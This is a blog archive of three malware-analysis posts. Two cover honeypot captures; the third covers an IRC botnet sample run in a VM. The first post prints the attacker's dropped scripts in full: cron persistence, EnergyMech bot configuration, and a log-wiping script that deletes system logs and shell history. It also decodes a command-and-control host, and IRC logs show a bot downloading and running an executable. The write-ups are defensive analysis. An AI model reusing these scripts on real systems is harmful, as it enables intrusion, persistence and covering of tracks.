Skip navigation

Tag Archives: botnet

There are a number of reasons that a hacker/skid might want control of a machine. Compromised hosts serve as an ideal place to launch attacks from, as when properly configured by an attacker (and hopefully not noticed by careless administrators), the bad guy can use this machine for a long time, for file storage, or as a place to launch further malicious attacks.

In a recent attack, I witnessed an attacker dropping multiple files on my machine, both forms of IRC bot software. One of them was a seemingly well known perl script created by Brazilian group, Atrix-Team. Since it’s written in perl rather than one of the standard compiled languages, it’s much easier to others to customise and spread. The second was a .tar full of c source code, a few binaries, and some bash scripts. Nice!

Let’s take a look:

$ ls -l
-rwxrwxr-x 1 ubuntu ubuntu    317 Oct 30  2006 autorun
-rwxrwxr-x 1 ubuntu ubuntu  12210 Aug  4 00:26 b
-rwxrwxr-x 1 ubuntu ubuntu    485 Aug  5 12:07 clear.sh
-rwxrwxr-x 1 ubuntu ubuntu   7768 Aug 26 17:38 inst
-rwxrwxr-x 1 ubuntu ubuntu 397274 Dec  2  2005 kswapd1
-rwxrwxr-x 1 ubuntu ubuntu     34 Aug  5 11:14 run
drwxrwxr-x 2 ubuntu ubuntu   4096 Aug  5 11:55 src
-rwxrwxr-x 1 ubuntu ubuntu    327 Aug  4 12:34 start
-rwxrwxr-x 1 ubuntu ubuntu    169 Aug  5 12:47 update

Fun stuff! I count 8 executable files, and 1 directory. To pick it apart piece by piece:

autorun
$ file autorun
autorun: POSIX shell script, ASCII text executable

#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update

This is an interesting script. It appears to add an entry to the cron tab to run update in the current directory. It then creates the update script, and sets it to executable by the current user.

update
$ file update
update: POSIX shell script, ASCII text executable

#!/bin/sh
if test -r /var/spool/.m/m.pid; then
pid=$(cat /var/spool/.m/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /var/spool/.m
./run &>/dev/null

This is the script created by autorun, and configured to trigger automatically via crontab. It checks that .m/.m.pid is readable, and if so, reads the PID from the file, and attempts to kill that process. It exists with value 0 if it succeeds, swaps to the directory where the malicious files are being stored, and executes run.

run
$ file run
run: POSIX shell script, ASCII text executable

#!/bin/sh
export PATH=".";kswapd1

Short but sweet. Exports the current directory to the path, and then executes kswapd1.

Sadly, we’re out of bash script land, now. We’re onto the meat of the matter, the binary itself:

kswapd1
$ file kswapd1
kswapd1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
$ checksums
79217fb606e9b14c3a8d6c399bc74492 md5

First off, the name. kswapd1 is an apparent attempt to survive casual inspection of the process list by mimicking kswapd, the kernel swap daemon responsible for memory management on the system.

We can run the ‘strings’ command on the executable to hopefully get an idea about what we’re getting in to. Inside, we can see a lot of references to IRC commands, and the distinctive word, EnergyMech. EnergyMech is a free/open source IRC bot programmed in c. The feature list is respectable, and seems like a useful feature set for any aspiring botnet owner. This coincides with the contents of the src/ folder we found in the initial .tar file. Also, there are a number of referenced files, presumably generated after the IRC bot is running:

.genuser
./m.
./m.set
./m.ses
./m.help
./m.lev
./m.msg
./m.pid
./r/rquit.e
./r/raway.e
./r/rkicks.e
./r/rversions.e
./r/rpickup.e
./r/rinsult.e
./r/rtsay.e

This is supported by the reappearence of m.pid, which is apparently saved and used to shut down the bot. Since EnergyMech’s feature set is well documented on the site, and the attacker was unsuccessful in configuring it, I won’t waste time further inspecting the binary for now.

clear.sh
$ file clear.sh
clear.sh: Bourne-Again shell script, ASCII text executable, with CRLF line terminators

#!/bin/bash
unset HISTFILE HISTZONE HISTSAVE HISTORY
history -r
history -c
unset WATCH
export HISTFILE=/dev/null
rm -rf /usr/adm/lastlog
rm -rf /var/log/secure*
rm -rf /var/log/lastlog*
rm -rf /var/log/messages*
rm -rf /var/log/auth*
rm -rf /var/log/maillog*
rm -fr /var/log/lfd.log*
touch /var/log/maillog
touch /var/log/lfd.log
touch /var/log/messages
touch /var/log/secure
touch /var/log/lastlog
rm -rf /root/.bash_history
touch /root/.bash_history
./b -u root

A simple bash script to clear all logs, then recreate the files. It then runs b -u root.

b
$ file b
b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped

A quick look at the ‘strings’ output yields several references to log cleaning. Using the poor man’s debugger (google) we identify one of the distinctive strings, ‘didn’t found any parametr to clean (username, hostname, tty)!’ as belonging to WhiteCat, a binary/log cleaner written in c by a member of the Hell Knights Crew.

There are two extra files that don’t seem to have been called so far by the others, inst and start. For the sake of completeness, I will give a breakdown of each.

start
$ file start
start: Bourne-Again shell script, ASCII text executable

#!/bin/bash
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' | grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
sleep 1
while read line; do
   ./inst $1 $line
case "$D" in
"1")
D=2
;;
"2")
D=3
;;
"3")
D=4
;;
"4")
D=1
;;
esac
 done < $B
./run
./autorun

The first string of greps retrieves the IP address(es) of the host, and saves them into the file ‘vhosts’. That file is then read line by line, with each IP being passed to inst along with another parameter, the channel. Finally, run and autorun are both called.

inst
$ file inst
inst: Bourne-Again shell script, ISO-8859 text executable

#!/bin/bash
Denominations="gaina
martoaga
martianu
sambatar
....snip....
costel
daniela
lucica
lucia"

ident=($Idents)
num_idents=${#ident[*]}

Realnames="Sato
Suzuki
Takahashi
Tanaka
Watanabe
....snip....
Demers
Gosselin"

denomination=($Denominations)
num_denominations=${#denomination[*]}

echo "SERVER Tampa.FL.US.Undernet.org 6667" >> m.set
echo "SERVER budapest.hu.eu.undernet 6667" >> m.set
echo "SERVER zurich.ch.eu.undernet.org" >> m.set
echo "SERVER lidingo.se.eu.undernet.org 6667" >> m.set
echo "SERVER manchester.uk.eu.undernet.org 6667" >> m.set
echo "SERVER mesa.az.us.undernet.org 6667" >> m.set
echo "SERVER bucharest.ro.eu.undernet.org 6667" >> m.set

echo "ENTITY $2" >> m.set

echo "### BOT 1 ###" >> m.set
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "USERFILE $2.user" >> m.set
echo "CMDCHAR ." >> m.set
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "MODES +iwsx" >> m.set
echo "HASONOTICE" >> m.set
echo "VIRTUAL $2" >> m.set
echo "TOG CC          1" >> m.set
echo "TOG CLOAK       1" >> m.set
echo "TOG SPY         1" >> m.set
echo "SET OPMODES     6" >> m.set
echo "SET BANMODES    6" >> m.set
echo "CHANNEL         #$1 " >> m.set
echo "TOG PUB         1" >> m.set
echo "TOG MASS        1" >> m.set
echo "TOG SHIT        1" >> m.set
echo "TOG PROT        1" >> m.set
echo "TOG ENFM        0" >> m.set
echo "SET MKL         7" >> m.set
echo "SET MBL         7" >> m.set
echo "SET MPL         1" >> m.set

echo "### BOT 2 ###" >> m.set
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "USERFILE $2.user2" >> m.set
echo "CMDCHAR ." >> m.set
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "MODES +iwsx" >> m.set
echo "HASONOTICE" >> m.set
echo "VIRTUAL $2 " >> m.set
echo "TOG CC          1" >> m.set
echo "TOG CLOAK       1" >> m.set
echo "TOG SPY         1" >> m.set
echo "SET OPMODES     6" >> m.set
echo "SET BANMODES    6" >> m.set
echo "CHANNEL         #$1 " >> m.set
echo "TOG PUB         1" >> m.set
echo "TOG MASS        1" >> m.set
echo "TOG SHIT        1" >> m.set
echo "TOG PROT        1" >> m.set
echo "TOG ENFM        0" >> m.set
echo "SET MKL         7" >> m.set
echo "SET MBL         7" >> m.set
echo "SET MPL         1" >> m.set

echo "handle  z " >> $2.user
echo "mask  *!*@zmeu.users.undernet.org " >> $2.user

echo "prot  4" >> $2.user
echo "channel   * " >> $2.user
echo "access  100 " >> $2.user

echo "handle  z " >> $2.user2
echo "mask  *!*@zmeu.users.undernet.org " >> $2.user2
echo "prot  4" >> $2.user2
echo "channel   * " >> $2.user2
echo "access  100 " >> $2.user2

This file appears to be generating the configuration for the EnergyMech bots, as well as individual user files. It takes two inputs, $1 and $2, from ./start. $1 is the channel to join, and #2 appears to be the IP address of the user. A random nick is selected from the list in the script, which seemed to be a mix of actual names, and random words.

Fortunately, from the kippo log, the attacker kindly showed us exactly what channel he was trying to use. Unfortunately, if it’s hosted on a public server, it’s going to be very resilient. I hopped onto a VPN, and into the IRC to have a look around. There were 21 users, including 2 operators, 1 of whom was an undernet service. The other had a cloaked hostname. Of the rest, 4 had undernet cloaked hostnames, and the remainder did not. A small botnet, if my suspicions are correct, and unlikely to grow fast if the operators are manually installing the bots on compromised hosts.

Thanks for stopping by, @DINAMO of #raul, connecting to the honeypot from 87.219.142.165 on Oct 26th. It’s always fun to have ‘live ammunition’ to play with.

Bonus Round

The perl script was downloaded from hxxp://dearlifefuckyou.com/xaoc/max.txt, and the homepage of dearlifefuckyou.com is blanked out except for an advert and the text “// xaoc was here”. The config of the perl script was as follows:

my $section=chr(120) . chr(46) . chr(115) . chr(105) . chr(116) . chr(104) . chr(110) . chr(101) . chr(116) . chr(46) . chr(111) . chr(114) . chr(103);
my $porta=chr(49) . chr(49) . chr(50) . chr(49) . chr(49);
my @interval=chr(35) . chr(46) . chr(106);
my @location=chr(120) . chr(88) . chr(120);
my $mapp=chr(115) . chr(117) . chr(110);
push(@location,$mapp);

While this is top end obfuscation, I think we can crack it.

my $section=x.sithnet.org;
my $porta=11211;
my @interval=#.j;
my @location=xXx;
my $mapp=sun;
push(@location,$mapp);

While it is not currently up, sithnet.org resolves to 212.199.115.203, which has also gone by terahost.tv and has a history of bad behaviour.

Advertisements

Over a slow weekend, I decided to make my first attempt at running a Dionaea honeypot to catch some malware samples to play with. Armed with this simple guide and a micro Amazon EC2 instance, the whole thing was up and running in well under an hour. For my first attempt, I stuck with the default configuration. I imagine there’s a lot of improvements and tweaks that I entirely missed.

It didn’t take long to start getting hits, and after three days I stopped. The honeypot had produced a 6.1gb log, and the instance was beginning to complain that there was no space left on the drive to write to. I had managed to snag three binaries:

47b2e95136e660522067221ae405025c
9b9df225dfc4b43c727b9177e9eb0678
fd1fb45d7ca1eeef06f5d46a3e9a3d2f

It had been surveyed by 2387 unique IP addresses over 10 different protocols. However, I found that all three binaries on the system were the responsibility of one hacker (group?), originating from a Ukrainian IP address.

We can see the connections here:

Time                  Protocol      Local Port   Remote IP
2012-09-19 17:43:49   smbd          445          46.119.232.93
2012-09-19 17:43:49   smbd          445          46.119.232.93
2012-09-19 17:43:52   remoteshell   1957         46.119.232.93
2012-09-19 19:15:52   smbd          445          46.119.232.93
2012-09-19 19:15:52   smbd          445          46.119.232.93
2012-09-19 19:15:56   remoteshell   1957         46.119.232.93

And here we have the downloads:

URL                            md5
hxxp://46.120.20.85:12097/x    9b9df225dfc4b43c727b9177e9eb0678
txxp://46.128.183.60/host.exe  fd1fb45d7ca1eeef06f5d46a3e9a3d2f
txxp://46.128.183.60/host.exe  fd1fb45d7ca1eeef06f5d46a3e9a3d2f
txxp://46.128.172.44/host.exe  47b2e95136e660522067221ae405025c

The next interesting point is the urls in the log. The majority of urls captured seemed primarily used for spam. Some quick stats:

3059 mail login attempts
293845 advertisement urls
71 forum registrations

Next up, fun with Kippo.

So I found an interesting site that parsed Twitter feeds for potentially malicious links. Based on the filenames mentioned, it did so with reasonable accuracy. So I did what any sensible person would do: fired up a handy Windows XP VM and followed some links.

The first bit of malware was not difficult to find. A compromised Twitter account has been spamming links for the past week, using the much loved .jpg.exe gambit.

I set wireshark to run, and with bated breath, ran the executable.

3	10.0.2.15	194.168.4.100	Standard query A xx.wshells.ws
4	194.168.4.100	10.0.2.15	Standard query response, No such name
5	10.0.2.15	194.168.4.100	Standard query A bxxxa.wshells.ws
6	194.168.4.100	10.0.2.15	Standard query response A 208.xx.xx.77

Straight away, it made two DNS requests, both looking for subdomains of wshells.ws. wshells.ws offers hosting, shells and IRC services to anyone with a few dollars to spare, per month. Consulting their FAQ, “abusive” botnets are not allowed, but no abuse email is listed on the contact page.

Anyway. As you can see, the response from the DNS lookup was that bxxxa.wshells.ws was located at 208.xx.xx.77. I watched as the program connected to an IRC channel. The MOTD informed me that this was one of 13 botnet servers, running an IRC daemon modified by unKn0wn Crew. A quick google shows that this is a modded version of the popular Unreal IRCd. Doesn’t take much more digging to find the (alleged) source of the modified daemon.

echo "|     UnrealIRCd - Modded by iD [uNkn0wn-Crew]     |"
echo "|          www.uNkn0wn.eu - iD@uNkn0wn.eu          |"
echo "|--------------------------------------------------|"
echo "|     IT IS VERY PRIVATE, SO DO NOT DISTRIBUTE     |"

The server itself seems to be run by a different group.

Irc.D3v1Lz.Com Message of the Day - 
5/4/2012 15:17
###################################################
# ________  ________       ____.____              #
# \______ \ \_____  \__  _/_   |    |    ________ #
#  |    |  \  _(__     \/ /|   |    |    \___   / #
#  |    `   \/       \   / |   |    |___  /    /  #
# /_______  /______  /\_/  |___|_______ \/_____ \ #
#         \/       \/                  \/      \/ #
# __________        __   _______          __      #
# \______   \ _____/  |_ \      \   _____/  |_    #
#  |    |  _//  _ \   __\/   |   \_/ __ \   __\   #
#  |    |   (   )  | /    |    \  ___/   |  |     #
#  |______  /\____/|__| \____|__  /\___   __|     #
#         \/                    \/     \/         #
###################################################
      D3v1Lz BotNet Server, Just Stay Away   
   1 Of 13 BotNet Server Managed By Sh "Opper"
               Testing Server

From what I can tell, the nickname that the malware uses upon connection to the server is of the form:

[?]{[countrycode]|[OS]}[randomisedname]

for example:

a{USA|XPa}qafsffg

After connecting, the following exchange was had:

JOIN #$wsh [pass removed]
:n{GB|XPa}a{USA|XPa}qafsffg@host.name.redacted.com JOIN :#$wsh
:Irc.D3v1Lz.Com 332 a{USA|XPa}qafsffg #$wsh :@nd http://up2x.com/u/1943960303.image001234.exe
:Irc.D3v1Lz.Com 333 a{USA|XPa}qafsffg #$wsh Sp5 1340769512
PRIVMSG #$wsh :[d="hxxp://up2x.com/u/1943960303.image001234.exe" s="387584 bytes"] Executed file "C:\Documents and Settings\Administrator\Application Data\207.exe" - Download retries: 0
:Irc.D3v1Lz.Com 404 a{USA|XPa}qafsffg #$wsh :You must have a registered nick (+r) to talk on this channel (#$wsh)
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com

Wireshark shows that at this time, a DNS request was made to resolve up2x.com, and download 1943960303.image001234.exe, reporting the success back to the control channel. I may analyse the dropped executables in another post. After a few minutes of ping-pong between the VM and the IRC server, I exported the dump, and shut down the VM.

I expect this is an upcoming project of someone’s. The IRC channel was empty except for me, and as the MOTD says, it’s a testing server. Furthermore, the compromised twitter account has only been spamming malware links for about a week.